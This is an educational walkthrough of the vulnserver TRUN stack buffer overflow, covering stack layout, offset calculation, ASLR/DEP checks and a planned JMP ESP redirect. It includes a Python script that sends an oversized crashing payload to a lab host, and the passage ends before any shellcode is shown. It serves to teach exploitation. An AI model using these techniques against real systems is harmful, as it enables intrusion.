# Buffer Overflow - Explained

## Motivation

Buffer overflows have been covered by a lot of people in hundreds of writeups, videos and blogs. However, while teaching this subject to myself I often found phrases or explanations that left out important details, were immensely vague or even turned out to be straight up false.

Since I like to get into the details of how things work and *why* they work, I decided to share the entire manual process of dissecting one very common and basic buffer overflow.

For this I will use the vulnserver, specifically the `TRUN` command - starting from confirming the vulnerable entry point all the way up to spawning a reverse shell without taking any guesses.

{% hint style="info" %}
It is entirely up to you whether you use this resource as a supplement or as a standalone read.
{% endhint %}

If this is your first time ever reading about buffer overflows - or you just want a quick hands-on intro - maybe check out my [Final Notes](#practical-buffer-overflow-introductions) first. There you'll find some good YouTube tutorials with the typical and far more practical approach. Here we're all about the details.

## The Vulnserver

Introducing one of the most common applications used for practicing buffer overflows:

{% embed url="<https://github.com/stephenbradshaw/vulnserver>" %}
The Vulnserver
{% endembed %}

As stated in the description, this is an intentionally vulnerable application with the sole purpose of learning different sorts of buffer overflows. Here, we are going to concentrate on the most basic scenario that's built in to the `TRUN` command (one of the many commands the vulnserver offers upon connecting to it).

### Setup

Depending on whether you want to follow along you'll need some tools:

* [VMware](https://customerconnect.vmware.com/downloads/details?downloadGroup=WKST-PLAYER-1623-NEW\&productId=1039\&rPId=85399) or [VirtualBox](https://www.virtualbox.org/wiki/Downloads) for creating a virtual lab environment
  * Make sure to put both VMs in the same network - preferably NAT Network in VBox and NAT in VMware
* A virtual machine for the attacker - I'll use [Kali Linux](https://www.kali.org/get-kali/#kali-virtual-machines)
* A [Windows virtual machine](https://developer.microsoft.com/en-us/windows/downloads/virtual-machines/) for the target (I'll use Windows 11)
  * Once set up, make sure to [disable Real-time protection](https://support.microsoft.com/en-us/windows/turn-off-defender-antivirus-protection-in-windows-security-99e6004f-c54c-8509-773c-a4d776b77960)
  * Download vulnserver from <https://github.com/stephenbradshaw/vulnserver>
    * You need at least the `essfunc.dll` and `vulnserver.exe` in the same directory
  * [Process Explorer](https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer) (Windows Sysinternals)
  * A hex editor like [Hexinator](https://hexinator.com/hexinator-windows/)

### 32-bit Stack Basics

Before we start looking at any code or exploit I want to give a brief introduction to the 32-bit stack.

{% hint style="info" %}
This is not meant to be a comp-sci class. I'll assume some basic computer knowledge.
{% endhint %}

First of all, what and where is the stack?

The stack is a region of your computer's memory (RAM). Simply speaking it's a "last-in-first-out" (LIFO) structure, responsible for storing any local variables that a function might need to remember or work with.

In the image below you can see the location of the stack in a broad depiction of the entire memory.

![Basic layout of the 32-bit memory](https://1971224599-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mhlz_oZ3oVPSWFmU_3o%2Fuploads%2F2pB7dmgygf4SZ5F1rKvl%2F32-bit-Memory.png?alt=media\&token=c70b22fe-d49a-4104-8b4e-88e74fa87959)

Notice that the highest address is at the top (all 32 bits set, i.e. 0xFFFFFFFF) and the lowest address is at the bottom. We can also see that there is a free memory region below the stack that can be used to allocate more space when needed (for example when calling a new function). Keep in mind that the stack grows towards lower addresses, meaning the stack grows **down**.

{% hint style="warning" %}
Always pay attention to the direction a stack is depicted by looking at the addresses. Some tools and resources reverse the layout and put the highest address at the bottom. Suddenly the stack "grows upwards" visually.
{% endhint %}

To avoid any confusion, the following is an example of the stack and its memory addresses plus the terms I will use to reference the stack in the future. The "bottom of the stack" faces towards the highest address and the "top of the stack" (i.e. the last item that was pushed on it) is located towards the lowest address.

{% hint style="info" %}
Yes, it's visually counter intuitive to name the lower address the top of the stack **but** logically it makes sense as we `push` to and `pop` from the *top*.
{% endhint %}

![](https://1971224599-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mhlz_oZ3oVPSWFmU_3o%2Fuploads%2FpR7aYxeBhaBZzCs8yLpl%2Fstackaddresses-on-32-bit-systems.png?alt=media\&token=164e6c20-5dd7-44d5-bfaf-a5a09b42dde6)

So how does the stack work and why is it important for us?

In addition to normal local variables a program will also save some meta values on the stack. These values help the program to keep track of things like "where do I return to when the current function ends" and "where are my arguments". And they are stored on the stack in a standardized way.

To be more explicit, I am talking about the contents of the (extended) base pointer (**EBP**) and the (extended) instruction pointer (**EIP**) registers that are both pushed on the stack whenever a function is called.

The final register that'll be important for us is the (extended) stack pointer (**ESP**). Its content is always the lowest available stack address (i.e. it points to the top of the stack).

{% hint style="info" %}
If you don't feel familiar with the terms ESP, EIP and EBP I would advise you to do some basic research on those before continuing.
{% endhint %}

Let's break down the basic order in which the stack is being filled when a function is called:

1. The caller pushes any <mark style="color:yellow;">arguments</mark> it wants to pass to the callee on the stack
2. The content of the <mark style="color:red;">instruction pointer</mark> register (i.e. the address of the next instruction after the function call) is pushed on the stack
3. The content of the <mark style="color:green;">base pointer</mark> register is pushed by the callee
4. The <mark style="color:blue;">stack pointer</mark> is decreased by the amount of requested memory space for local variables (12 bytes in the example below) (remember *decreasing* the ESP means *increasing* the stack)

Below you can see an example stack with fictional contents during a function call.

![](https://1971224599-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mhlz_oZ3oVPSWFmU_3o%2Fuploads%2F5aM5x7SpMLvl0codDVtF%2Fregisters-on-32-bit-systems.png?alt=media\&token=6fbb0373-640c-4afb-a46d-7e2bae269f9b)

Let's try to examine that scenario.

The **EIP** points to the next instruction to be executed (0x77864A5C - the next instruction inside our current function).

The **EBP** points to the base of the current stack frame - basically it's an anchor to reference local variables easily - here we have 0x0060DF1C. At this memory address we also find the previous frame pointer, which we can later load back into the EBP register to restore the previous function scope.

At **EBP + 0x4** (4 bytes above the EBP) we find the instruction pointer that was saved when this function was called. When the current function ends this value will be loaded (`pop`'ed) back into the EIP and program execution will continue at this address.

At **EBP + 0x8** we can find a parameter that was passed to the current function: 0xDEADBEEF in little endian format.

{% hint style="danger" %}
If you have difficulties following along so far I can suggest this resource which describes the steps from above (and more) in way greater detail: <https://textbook.cs161.org/memory-safety/x86.html>.
{% endhint %}

Below the EBP we see 12 bytes that were allocated and the **ESP** pointing to the top of that space. In this example this buffer was filled with the string "ABCDEFGHIJKL" (we're viewing the hexadecimal representation of the ASCII values).

{% hint style="warning" %}
Note that, since x86 stores multi-byte values in little endian format, an ASCII string like "ABCD", which sits in memory as the bytes 0x41 0x42 0x43 0x44, will be interpreted as the 32-bit value 0x44434241 when used as a pointer, for example.
{% endhint %}
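The byte order is easy to check with a few lines of Python. This is only a small sketch using the standard `struct` module; the variable names are mine and `0xDEADBEEF` is simply the example parameter from the graphic above.

```python
import struct

# The bytes as they sit in memory, lowest address first.
raw = b"ABCD"

# "<I" means: little endian, unsigned 32-bit integer.
value = struct.unpack("<I", raw)[0]
print(hex(value))

# The reverse direction: how a 32-bit value is laid out byte by byte.
packed = struct.pack("<I", 0xDEADBEEF)
print(packed.hex())
```

The second half is the direction we care about later: whenever an address has to be placed on the stack, its bytes must be written in this reversed order.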

As you can see, the buffer starts at the lowest address and is being filled up continuously.

So what happens when we start writing more than 12 bytes into that buffer? We **overflow** it.

After overflowing the 4 bytes of the frame pointer that lie directly above the buffer (at the next higher addresses) we can also overwrite the return address. That would allow us to redirect the execution flow to anywhere we want as soon as the current function ends.
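To make this tangible, here is a toy model of that stack frame in Python. It is a sketch under simplifying assumptions: the frame is just a `bytearray` laid out from low to high address (buffer, saved EBP, saved return address), the two saved values are made up, and `unchecked_copy` is a hypothetical stand-in for an unsafe copy routine.

```python
import struct

BUF_SIZE = 12  # size of the local buffer from the example


def build_frame() -> bytearray:
    """Low to high address: buffer | saved EBP | saved return address."""
    frame = bytearray(BUF_SIZE)
    frame += struct.pack("<I", 0x0060DF40)  # made-up saved EBP
    frame += struct.pack("<I", 0x77864A5C)  # made-up saved return address
    return frame


def unchecked_copy(frame: bytearray, data: bytes) -> bytearray:
    """Write data from the start of the buffer without checking BUF_SIZE."""
    frame[0:len(data)] = data
    return frame


def saved_values(frame: bytearray) -> tuple:
    """Read back the saved EBP and return address that follow the buffer."""
    return struct.unpack_from("<II", frame, BUF_SIZE)


fits = unchecked_copy(build_frame(), b"ABCDEFGHIJKL")
print([hex(v) for v in saved_values(fits)])

overflown = unchecked_copy(build_frame(), b"A" * 12 + b"BBBB" + b"CCCC")
print([hex(v) for v in saved_values(overflown)])
```

With exactly 12 bytes the saved values survive. With 20 bytes the saved EBP turns into 0x42424242 and the return address into 0x43434343.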

To conclude this introduction, here is a visual representation of what the basic idea of a buffer overflow looks like.

![(RIP in this scope must not be confused with the 64-bit version of the instruction pointer which is also called RIP.)](https://1971224599-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mhlz_oZ3oVPSWFmU_3o%2Fuploads%2F3jSa4QgwmCj4se7kIlLO%2Fbuffer-overflow-example.png?alt=media\&token=4dac561d-68f3-4f3c-9fbd-0ace16507fc7)

{% hint style="success" %}
With the theory at hand now let's dive into the practical part and examine the vulnserver.
{% endhint %}

### Locating the BOF

Let's look at the vulnserver. We know that for a buffer overflow to occur all we need is an unsafe way of writing an arbitrary amount of bytes to a buffer that's located on the stack.

Usually, finding such a potential vulnerability can be done by spiking the target application - but we'll try to identify the vulnerability manually (in the code) instead.

{% hint style="info" %}
Spiking is the process of testing an application with many different sorts of inputs in order to find a pattern that can cause a crash.
{% endhint %}

Using the manual approach obviously takes a lot longer because we have to look at the (decompiled) source code. But sooner or later we come across this `Function3`.

![Buffer overflow vulnerability in Function3 (decompiled code left and original source code on the right)](https://1971224599-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mhlz_oZ3oVPSWFmU_3o%2Fuploads%2Fr9SOqY8F86ztyINBDpGb%2Ffunction-3.png?alt=media\&token=33e1ba86-f219-4a3d-b17b-7a7839e20fcd)

Regardless of whether we had decompiled the `.exe` or gained access to the source code - we can see that in `Function3` an array of unchecked length is copied into a buffer of a fixed length (2000 bytes as per the source code) using `strcpy`. Hence, if the input was larger than the target buffer (`Buffer2S`) we'd overflow it.

{% hint style="info" %}
In case you wondered about the destination size (2008 vs. 2000 bytes), we'll see Ghidra's reason to display the 2008 in a second when we look at the disassembly.
{% endhint %}

The [manpage](https://man7.org/linux/man-pages/man3/strcpy.3.html) even warns about the unsafe use of `strcpy` - and there doesn't seem to be any safety check in place. At least not in this function. So let's find out how we can trigger this function and whether we can control the input arbitrarily.

### Triggering the BOF

Looking at the function references we can quickly identify the only place where `Function3` is being called from. Once again, we can get this information from either the decompiled or source code.

![Decompiled and original code that calls the vulnerable Function3](https://1971224599-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mhlz_oZ3oVPSWFmU_3o%2Fuploads%2FtsEvgVmN8LH0fEEY3ESO%2Ftrun-handler.png?alt=media\&token=13c526e9-ed98-475f-9123-f8d9f9e621e1)

With a tiny bit of reverse engineering we can outline the following steps:

{% hint style="info" %}
The `RecvBuf` contains all the bytes that were sent to the server and will be named "input" from here on.
{% endhint %}

* First the input must start with the five characters `"TRUN "`
* Then a buffer with 3000 elements is allocated and filled with zero (`TrunBuf`)
* If the input contains a `'.'` character anywhere starting from the 6th character
  * then the first up to 3000 bytes from the input are copied to `TrunBuf`
  * and `Function3` is called with `TrunBuf` as argument
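The steps above can be restated as a few lines of Python. This is only a model of the logic as described, not the server's code: the function name is made up, and it ignores C string details such as null termination.

```python
TRUN_BUF_SIZE = 3000  # size of TrunBuf according to the steps above


def bytes_passed_to_function3(received: bytes):
    """Return what would reach Function3, or None if it is never called."""
    # The input must start with the five characters "TRUN ".
    if not received.startswith(b"TRUN "):
        return None
    # A '.' must appear somewhere from the 6th character (index 5) onwards.
    if b"." not in received[5:]:
        return None
    # At most the first 3000 bytes of the whole input are copied,
    # command prefix included.
    return received[:TRUN_BUF_SIZE]


print(bytes_passed_to_function3(b"TRUN hello"))
print(len(bytes_passed_to_function3(b"TRUN ." + b"X" * 5000)))
```

Note that the copy starts at the very first byte of the input, so the `"TRUN "` prefix itself ends up in `TrunBuf` as well.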

The rest of the code clears `TrunBuf` and sends a hardcoded answer to the client but that's not important for us because we already got everything we need. Apparently we can cause the program to copy up to 3000 bytes of our input (that must start with at least `"TRUN ."`) into a buffer that's only \~2000 bytes large when `TrunBuf` is passed to `Function3`.

{% hint style="success" %}
We now combined the first couple of pieces to find a way of overflowing `Buffer2S`.
{% endhint %}

{% hint style="info" %}
To compare with usual tutorials, first you would have spiked the application to find that a large input containing a "`.`" can crash the `TRUN` command and subsequently you would have fuzzed\* the target to reveal that a length somewhere between 2000 and 3000 suffices.\
(\***Fuzzing** - sending inputs of increasing length until one causes a crash)
{% endhint %}

### Calculating the Offset

So far we know that a simple string like this: `'TRUN .' + 'X'*2994` (python syntax) would crash the target. (Remember that at most 3000 bytes are taken from our input so we don't have to bother sending any more than that.)
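As a sketch, building and sending that string could look like the following. The helper `send_payload` is hypothetical, and two things are assumptions on my side that you should check against your own lab: that the server greets each client with a banner before accepting commands, and the host and port in the commented-out call (9999 is the port vulnserver commonly listens on by default).

```python
import socket

# 6 bytes of prefix + 2994 filler bytes = 3000 bytes in total.
payload = b"TRUN ." + b"X" * 2994
print(len(payload))


def send_payload(host: str, port: int, data: bytes) -> None:
    """Connect to the target, read the greeting and send the data once."""
    with socket.create_connection((host, port), timeout=5) as conn:
        conn.recv(1024)  # greeting banner (assumed)
        conn.sendall(data)


# Placeholder address of the Windows VM in your own lab network:
# send_payload("192.168.56.10", 9999, payload)
```

Only run this against your own vulnserver instance inside the lab.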

Actually, we can be fairly certain that a 2100 byte long input would also be enough. Since there were no other visible local variables in the vulnerable function, the EBP and RIP are likely to be very close to the buffer.

However, in order to write an exploit that overwrites the RIP with a precise value we are going to need the *exact* offset of the RIP to the buffer we are overflowing.

{% hint style="info" %}
This step is typically called "finding the offset" and describes the use of a unique pattern that is sent to the target. The attacker then uses a debugger to find the value in the EIP at the time of the crash and searches that sequence in the original pattern, thus finding the offset of the bytes that overwrite the RIP.
{% endhint %}
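For reference, the pattern approach is simple enough to sketch in Python. This is my own minimal version of the idea (upper case letter, lower case letter, digit), not the code of any particular tool; the offset 1000 in the demo is arbitrary and only simulates a crash.

```python
import string
import struct


def make_pattern(length: int) -> bytes:
    """Build a non-repeating pattern of the form Aa0Aa1Aa2...Ab0Ab1..."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length].encode("ascii")
    raise ValueError("pattern too long for this alphabet")


def find_offset(eip_value: int, pattern: bytes) -> int:
    """Locate the 4 bytes that ended up in EIP; returns -1 if absent."""
    needle = struct.pack("<I", eip_value)  # registers hold little endian values
    return pattern.find(needle)


pattern = make_pattern(3000)
# Pretend the 4 pattern bytes at position 1000 were loaded into EIP.
simulated_eip = struct.unpack("<I", pattern[1000:1004])[0]
print(find_offset(simulated_eip, pattern))
```

Because every 4-byte window of the pattern occurs only once, the position of the crashed EIP value inside the pattern is the offset.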

Although the debugger would be the faster choice and definitely easier to use when the code is more complex, let's see what happens under the hood of `Function3`. For this purpose we'll have a look at the disassembled code.

![Function3 disassembled (with radare2)](https://1971224599-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mhlz_oZ3oVPSWFmU_3o%2Fuploads%2FSNaquaxb0JgBgXyCp0WD%2Ffunction-3-disas.png?alt=media\&token=da648317-e037-4a51-9db2-8d92fbe840c5)

If you have never read assembly before this might look intimidating at first but we'll walk through it.

The very first line shows the label of this function (`_Function3`) and the argument that is passed: `arg_8h`. As we've seen in the source code already this is an address pointing to our input.

The following three lines list some references and their relative addresses (kind of like variables but not quite like that!).

1. The `char*` reference `dest` points at "base pointer - 0x7d8"

   (Remember the 2008 from Ghidra? Since there is literally no other size indication or boundary to this array, Ghidra assumed the size of that array to be 0x7d8 or decimal: 2008.)
2. The `char*` argument `arg_8h` references "base pointer + 0x8" (Remember the graphic from the stack introduction? - "base pointer + 4" is the RIP and "base pointer + 8" is an argument to the current function)
3. The `char*` reference `src` points at "stack pointer + 0x4". Derived from the call to `strcpy` and conveniently for us, the names `src` and `dest` already hint to what these addresses are going to be used for.

All the pointers might be hard to visualize in mind the first time, so we will draw the stack out in a second. But before we do that let's cover the first three instructions of this function - the "[prologue](https://en.wikipedia.org/wiki/Function_prologue_and_epilogue)" which basically initiates this function on the stack.

1. `push ebp`: Store the current contents of the base pointer register on the stack - just like we discussed in the stack intro. The [`push`](https://c9x.me/x86/html/file_module_x86_id_269.html) instruction will automatically decrease the stack pointer so that it points at the top of the stack (to the last element that was pushed).
2. `mov ebp, esp` : Move the contents of the stack pointer to the base pointer register. Now both the EBP and the ESP point to the last item on the stack (which is the previous EBP value).
3. `sub esp, 0x7e8` : Subtract 0x7e8 (decimal: 2024) from the stack pointer, thus increasing the stack.
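The three prologue instructions can be replayed with plain integer arithmetic. In this sketch the entry value of ESP (0x0060DF14, the slot holding the saved return address) matches the example addresses used further down in this section, while the caller's EBP value is made up.

```python
def prologue(esp_at_entry: int, old_ebp: int, frame_size: int = 0x7E8):
    """Replay push ebp / mov ebp, esp / sub esp, frame_size."""
    memory = {}
    esp = esp_at_entry

    esp -= 4               # push ebp: move the stack pointer down by 4 bytes ...
    memory[esp] = old_ebp  # ... and store the caller's EBP at the new top
    ebp = esp              # mov ebp, esp
    esp -= frame_size      # sub esp, 0x7e8
    return esp, ebp, memory


esp, ebp, memory = prologue(esp_at_entry=0x0060DF14, old_ebp=0x0060DF40)
print(hex(ebp), hex(esp), hex(ebp - 0x7D8))
```

The last printed value is the address that `dest` refers to (EBP - 0x7d8), i.e. the start of the buffer we are going to overflow.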

So currently the stack looks like this:

![](https://1971224599-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mhlz_oZ3oVPSWFmU_3o%2Fuploads%2FPGeuAOmVaQ9FeTtswpO0%2Fstack-layout-1.png?alt=media\&token=f6b8c1d4-d2e4-4dac-b720-c7df3a608931)

With the next four instructions we get the following layouts:

![](https://1971224599-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mhlz_oZ3oVPSWFmU_3o%2Fuploads%2F05Y3Qm1KlnVarZUkvUj0%2Fstack-layout-2.png?alt=media\&token=297f04bc-0cc0-4ce1-b819-ecadcd976799)

Basically, the pointer to our input buffer (the 3000 byte array) is now stored at 0x0060D72C.

![](https://1971224599-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mhlz_oZ3oVPSWFmU_3o%2Fuploads%2FOkyTT0ABr6S4muHZSaSG%2Fstack-layout-3.png?alt=media\&token=55a2d5be-85a6-44bc-b374-02cd2ea322a2)

And now we stored the address 0x0060D738 (that was previously labelled `dest`) at 0x0060D728.

Remember the references from the first three lines? The address that's now on the top of the stack (visual bottom) was referenced with `dest` and the value below the top was named `src`. That's because the next instruction is a `call` to the function `sym._strcpy` and we know that before we call a function we must push its arguments to the stack.

{% hint style="info" %}
As a side note, [x86 calling conventions](https://levelup.gitconnected.com/x86-calling-conventions-a34812afe097) state that the arguments to a function shall be pushed on the stack in reversed order. So the last argument to a function must be pushed first (lands at the higher address).
{% endhint %}

So when calling `strcpy(destination, source)` - indeed the value at the top of stack becomes the destination address and the value below that becomes the source address.

This leads us to the conclusion that we will copy up to 3000 bytes from our input to the address 0x0060D738 in the example above. As a reminder, this means that starting from the address 0x0060D738 we write characters to increasing addresses. After *offset* bytes we will start to write at the position of the saved instruction pointer. Finally, the offset to the RIP can be calculated easily:

"Address of the RIP" - "Start address of the overflowing buffer" = Offset

In our case that's 0x0060DF14 - 0x0060D738 = 2012 bytes.

{% hint style="info" %}
It doesn't matter what addresses we choose in our example because we only care about the distance between the two addresses.
{% endhint %}

{% hint style="success" %}
So now we successfully calculated the exact amount of bytes that we need to put on the stack before we start overwriting the RIP: 2012.
{% endhint %}

(Of course we could've just taken the offset of the destination buffer immediately: ebp-0x7d8 and then add 0x4 to account for the ebp and we'd get the same result - but knowing the details of why that works was worth the long way in my opinion.)
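Both ways of arriving at the offset fit in a few lines of Python. The constant names are mine; the numbers are the ones from this section.

```python
RETURN_ADDRESS_SLOT = 0x0060DF14  # where the saved return address (RIP) lives
BUFFER_START = 0x0060D738         # start of the destination buffer (ebp - 0x7d8)

# The long way: distance between the two addresses.
offset_from_addresses = RETURN_ADDRESS_SLOT - BUFFER_START

# The shortcut: distance from the buffer to EBP plus 4 bytes for the saved EBP.
offset_from_disassembly = 0x7D8 + 0x4

print(offset_from_addresses, offset_from_disassembly)
```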

### Finding a Path to Exploitation

So far we know exactly how to overwrite the return instruction pointer and have the option to put in any address that we like. But how do we choose which address to use?

{% hint style="info" %}
The goal now is to find a suitable return address - and that's most often done using [`mona.py`](https://github.com/corelan/mona) and [Immunity Debugger](https://www.immunityinc.com/products/debugger/). However, let's try to break down the steps that are made for us here.
{% endhint %}

Before investigating the overflow further we should check for any security measures. In principle, since the buffer overflow is a rather old vulnerability, executables can be protected in a lot of ways that each prevent or at least impede different exploitation techniques.

The most prominent protection mechanisms that are going to be important for us are Address Space Layout Randomization (**ASLR**) and Data Execution Prevention (**DEP**). Feel free to dig deeper into other mechanisms as well but here I'll just focus on briefly covering these two.

#### Address Space Layout Randomization - [ASLR](https://en.wikipedia.org/wiki/Address_space_layout_randomization)

Without any protection enabled, a program that's being loaded into memory would always land at the exact same [virtual](https://en.wikipedia.org/wiki/Virtual_address_space) address. With the layout being this predictable, an adversary could easily calculate the address of any instruction in that binary and use it in an overflow attack.

ASLR forces the memory addresses to be randomized - so the program will land at a different address each time it is loaded. Consequently, the attacker can not predict an address and will have a harder time finding a suitable one.

#### Data Execution Prevention - [DEP](https://docs.microsoft.com/en-us/windows/win32/memory/data-execution-prevention)

DEP, also called NX (which stands for **N**o e**X**ecute), is a protection that prevents the CPU from executing any commands that reside in certain memory areas (such as the stack). If we were to attempt execution of commands placed inside our buffer on the stack while DEP is active - then our program would terminate with a memory access violation exception.

{% hint style="info" %}
Both measures have been around for quite some time and should be enabled whenever developing an application, especially when using a language like C.

Note that even when used together they could still be bypassed using some sort of address leak and return oriented programming - but that's out of scope here.
{% endhint %}

Coming back to the `vulnserver`, we can check an executable for enabled ASLR and DEP by inspecting the [PE headers](https://docs.microsoft.com/en-us/windows/win32/debug/pe-format#dll-characteristics). Below you'll find the output of a tool called [`winchecksec`](https://github.com/trailofbits/winchecksec) that extracts the relevant values and prints them.

![ASLR and DEP disabled on the vulnserver.exe](https://1971224599-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mhlz_oZ3oVPSWFmU_3o%2Fuploads%2F6v3EDNSb3HRMvTAKl9Dc%2Faslr-and-nx-disabled.png?alt=media\&token=506b35cb-6868-40b3-9d33-839044b80eea)

We notice that neither ASLR nor DEP (NX in this output) is enabled. Meaning that we:

1. know where `vulnserver.exe` will be in memory and
2. are able to execute arbitrary code that we can put on the stack.
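If you want to see where those two values come from, the relevant flags can also be read by hand. The sketch below is not how `winchecksec` is implemented; it only follows the PE header layout (the `DllCharacteristics` field sits 70 bytes into the optional header) and tests the two bits for ASLR and DEP. The function names and the file path in the commented-out usage are my own.

```python
import struct

IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040  # image may be relocated (ASLR)
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100     # image is compatible with DEP


def read_dll_characteristics(image: bytes) -> int:
    """Return the DllCharacteristics field of a PE file given as bytes."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    # Offset 0x3C of the DOS header holds the file offset of the PE signature.
    pe_offset = struct.unpack_from("<I", image, 0x3C)[0]
    if image[pe_offset:pe_offset + 4] != b"PE\x00\x00":
        raise ValueError("PE signature not found")
    # Skip the 4-byte signature and the 20-byte COFF file header.
    optional_header = pe_offset + 4 + 20
    return struct.unpack_from("<H", image, optional_header + 70)[0]


def protections(image: bytes) -> dict:
    """Report whether the ASLR and DEP opt-in bits are set."""
    flags = read_dll_characteristics(image)
    return {
        "aslr": bool(flags & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE),
        "dep": bool(flags & IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
    }


# Usage on the target binary (path is a placeholder):
# with open("vulnserver.exe", "rb") as handle:
#     print(protections(handle.read()))
```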

With that information we are ready to come up with a first plan for our exploit.

![](https://1971224599-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mhlz_oZ3oVPSWFmU_3o%2Fuploads%2F0ACAQM2nfQXkKUX31pSc%2Foverflow-scenarios.png?alt=media\&token=5b11ffed-1ad3-4467-85f1-c0f9f107a9a2)

Either we put our exploit code - remember our goal is to spawn a reverse shell, so from here on I'll refer to that *code* as **shellcode** - at the very beginning of our buffer or after the RIP. (We will ignore other techniques such as ROP for brevity here.)

However, in both scenarios the RIP should point to the start of the code - which is an address somewhere *on the stack*. While we know the address of any instruction in our executable, unfortunately we don't know the exact address of our overflown buffer on the stack.

{% hint style="info" %}
Although ASLR is disabled for the `vulnserver.exe`, each connection handler is spawned in a new thread via `Kernel32.dll`, which does have ASLR enabled as we'll see in a bit, thus also [randomizing the stack address for the new thread](https://security.stackexchange.com/questions/18556/how-do-aslr-and-dep-work).
{% endhint %}

Additionally, relying on a hardcoded stack address wouldn't be a very portable solution for an exploit anyway because the stack can depend on things like the OS version and environment.

So instead we'll be using another way to jump into the stack. To understand that technique, let's reiterate one more time over the exact contents of the stack and registers during runtime (feel free to skip ahead if you already know where I'm going with this, but for those new to the topic I hope that repeating the visualization of the stack might be useful).

![Feel free to compare with the graphics from "Calculating the Offset"](https://1971224599-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mhlz_oZ3oVPSWFmU_3o%2Fuploads%2FOe0kMYlarXXW0v0KwKRz%2Fexploit-flow-part-1.png?alt=media\&token=45353a32-1349-4cad-98a6-d092479757a1)

So far this graphic shouldn't be surprising. After the call to `strcpy` was made, we've overflown the buffer and overwritten the previous EBP and RIP values stored on the stack. What's important is the next instruction (EIP points to it) and the one after that. Let's see what these do:

![](https://1971224599-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mhlz_oZ3oVPSWFmU_3o%2Fuploads%2FJWXTdicnUVf8YgLeSBA1%2Fexploit-flow-part-2.png?alt=media\&token=aac3ed50-9bab-42cb-9205-db1f11a47588)

The [`leave`](https://c9x.me/x86/html/file_module_x86_id_154.html) instruction is responsible for cleaning up the allocated stack space of a function. It will revert the changes made to the ESP and point it to the current address stored in EBP, indicating that everything below that is now free stack space (it does not modify any values on the stack). In a second step the `leave` executes `pop EBP` which will load the value from the current top of the stack (expected to be the previous base pointer) into the EBP register and increment the ESP accordingly. Thus, after the `leave` and before the `ret` the ESP points to what should be the return instruction pointer.

The [`ret`](https://c9x.me/x86/html/file_module_x86_id_280.html) instruction then effectively performs a `pop EIP`, loading the current value on the top of the stack into the EIP register. Consequently, the next address at which execution would continue is 0x12121212 in this example. The `pop` also increases the ESP so that it continues to point at the top of the stack (right at what was previously the function argument).

This may have been very verbose, but we've now learned that there is a **register that contains an address pointing directly to our buffer** (after the RIP value to be precise).
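The same two instructions can be traced in a tiny Python model. It is a sketch with the example addresses from "Calculating the Offset"; the stack is reduced to a dictionary of three 4-byte slots, and the overwritten contents (apart from the 0x12121212 return address from the graphic) are made up.

```python
def leave_and_ret(regs: dict, stack: dict) -> dict:
    """Apply leave (mov esp, ebp; pop ebp) followed by ret (pop eip)."""
    regs = dict(regs)
    regs["esp"] = regs["ebp"]         # leave, step 1: release the local variables
    regs["ebp"] = stack[regs["esp"]]  # leave, step 2: pop the saved EBP ...
    regs["esp"] += 4                  # ... which moves ESP up by 4 bytes
    regs["eip"] = stack[regs["esp"]]  # ret: pop the return address into EIP ...
    regs["esp"] += 4                  # ... which moves ESP up by another 4 bytes
    return regs


stack = {
    0x0060DF10: 0x41414141,  # saved EBP, overwritten with filler
    0x0060DF14: 0x12121212,  # saved return address, overwritten
    0x0060DF18: 0x43434343,  # first 4 bytes of our input after the return address
}
before = {"esp": 0x0060D728, "ebp": 0x0060DF10, "eip": 0}
after = leave_and_ret(before, stack)
print({name: hex(value) for name, value in after.items()})
```

After both instructions ESP holds 0x0060DF18, the address of the bytes that directly follow the overwritten return address.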

{% hint style="warning" %}
The reason we've looked at this particular step in detail is that some tutorials and guides talk about "overflowing the ESP", "writing to the ESP" or "the ESP containing shellcode" which is very misleading. The ESP is a *register* and it contains a 4 byte *address*!
{% endhint %}

Coming back to our task at hand, we may not know a stack address ourselves but we do know a register that contains the address required for exploit *Variant B* to work.

Combining this with our ability to predict addresses of instructions in the vulnserver binary we can now make a new exploit plan that attempts to redirect execution to a `JMP ESP` instruction somewhere in the loaded code. The `JMP ESP` will then cause the CPU to jump to the address stored in ESP which we know points to our shellcode.

![Path to exploitation via JMP ESP instruction](https://1971224599-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mhlz_oZ3oVPSWFmU_3o%2Fuploads%2FKmPczmPawptRVj6M4FVo%2Fexploit-path.png?alt=media\&token=de859ba7-4c89-4526-b413-6bce078072c4)

{% hint style="success" %}
It seems that all that's left to do is to find the address of a `JMP ESP` instruction somewhere in the `vulnserver` binary.
{% endhint %}

We previously found out that we can predict any address of instructions in code segments due to disabled ASLR. But how exactly?

Let's dig a bit more into that statement. The default address for an executable in memory is 0x00400000 and [over here](https://devblogs.microsoft.com/oldnewthing/?p=43923) you'll find a great resource on the *why* for that. But more interestingly, you can confirm that yourself by looking at the base address during runtime.

{% hint style="info" %}
